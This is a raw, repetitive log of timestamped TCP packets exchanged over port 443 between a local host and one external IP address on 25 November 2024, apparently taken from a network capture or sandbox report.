                                                                                                                                                                                Nov 25, 2024 14:07:03.527491093 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.527587891 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.527601957 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.685329914 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.685405970 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.685458899 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.687983990 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.688050032 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.688066959 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.691195011 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.691267967 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.691298008 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.693893909 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.693964005 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.693979025 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.697674990 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.697734118 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.697748899 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.699959040 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.700032949 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.700040102 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.702512980 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.702574968 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.702581882 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.705976963 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.706042051 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.706049919 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.708811998 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.708884954 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.708893061 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.711416960 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.711493015 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.711522102 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.714309931 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.714391947 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.714404106 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.717592955 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.717672110 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.717685938 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.720143080 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.720220089 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.720232964 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.722853899 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.722923994 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.722937107 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.726429939 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.726497889 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.726511002 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.729259014 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.729337931 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.729352951 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.887114048 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.887176037 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.887209892 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.889667988 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.889750957 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.889770985 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.892282009 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.892344952 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.892359018 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.895699978 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.895768881 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.895785093 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.898313999 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.898379087 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.898392916 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.901698112 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.901767969 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.901783943 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.904256105 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.904323101 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.904336929 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.906903028 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.906965971 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.906980038 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.910317898 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.910377026 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.910389900 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.912913084 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.912988901 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.913022041 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.915949106 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.916013002 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.916053057 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.918622017 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.918673038 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.918698072 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.921979904 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.922061920 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.922080994 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.924570084 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.924643040 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.924652100 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.927320957 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.927598953 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.927613974 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.930623055 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:03.930705070 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:03.930723906 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.088948965 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.089034081 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.089103937 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.091523886 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.091583967 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.091651917 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.094508886 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.094578981 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.094626904 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.097601891 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.097671032 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.097683907 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.100172997 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.100253105 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.100271940 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.102796078 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.102874041 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.102881908 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.106178999 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.106259108 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.106292009 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.109251022 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.109323025 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.109353065 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.111414909 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.111476898 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.111488104 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.114788055 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.114890099 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.114902973 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.117846012 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.117942095 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.117955923 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.120460987 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.120533943 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.120548010 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.123090029 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.123161077 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.123174906 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.126445055 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.126511097 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.126524925 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.129152060 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.129231930 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.129245043 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.131774902 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.131860971 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.131877899 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.290184021 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.290276051 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.290318012 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.292717934 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.292788029 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.292797089 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.296026945 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.296087980 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.296098948 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.298795938 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.298870087 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.298887014 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.302093029 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.302176952 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.302191973 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.304653883 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.304734945 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.304748058 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.307374954 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.307462931 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.307476044 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.310806036 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.310894966 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.310909033 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.313287020 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.313369989 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.313384056 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.315964937 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.316046953 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.316060066 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.319010019 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.319072962 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.319086075 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.322367907 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.322451115 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.322464943 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.324938059 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.325020075 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.325032949 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.327758074 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.327821970 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.327836037 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.330965042 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.331049919 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.331062078 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.489619970 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.489830017 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.489912987 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.491111040 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.491194010 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.491213083 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.494474888 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.494570971 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.494585037 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.497157097 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.497240067 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.497258902 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.500854969 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.500936031 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.500967026 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.503091097 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.503184080 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.503196955 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.505803108 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.505882978 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.505896091 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.509150982 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.509237051 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.509252071 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.511861086 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.511946917 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.511962891 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.514497042 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.514583111 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.514605045 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.518045902 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.518138885 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.518174887 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.520848036 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.520926952 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.520947933 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.523401022 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.523477077 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.523494959 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.526120901 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.526206970 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.526222944 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.529467106 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.529556990 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.529571056 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.532145977 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.532232046 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.532250881 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.691384077 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.691482067 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.691546917 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.693300009 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.693375111 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.693392038 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.695979118 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.696043015 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.696054935 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.699291945 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.699367046 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.699382067 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.702095032 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.702191114 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.702213049 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.705262899 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.705365896 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.705389977 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.708036900 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.708121061 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.708152056 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.710519075 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.710566998 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.710592031 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.710642099 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.713927984 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.713995934 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.714030027 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.716523886 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.716597080 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.716630936 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.719461918 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.719525099 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.719547987 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.722330093 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.722434044 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.722455978 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.725616932 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.725701094 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.725723982 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.728271961 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.728360891 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.728377104 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.731034040 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.731123924 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.731131077 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.734412909 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.734484911 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.734517097 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.892462015 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.892540932 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:04.892579079 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.894618988 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:04.894697905 CET49168443192.168.2.22193.30.119.205
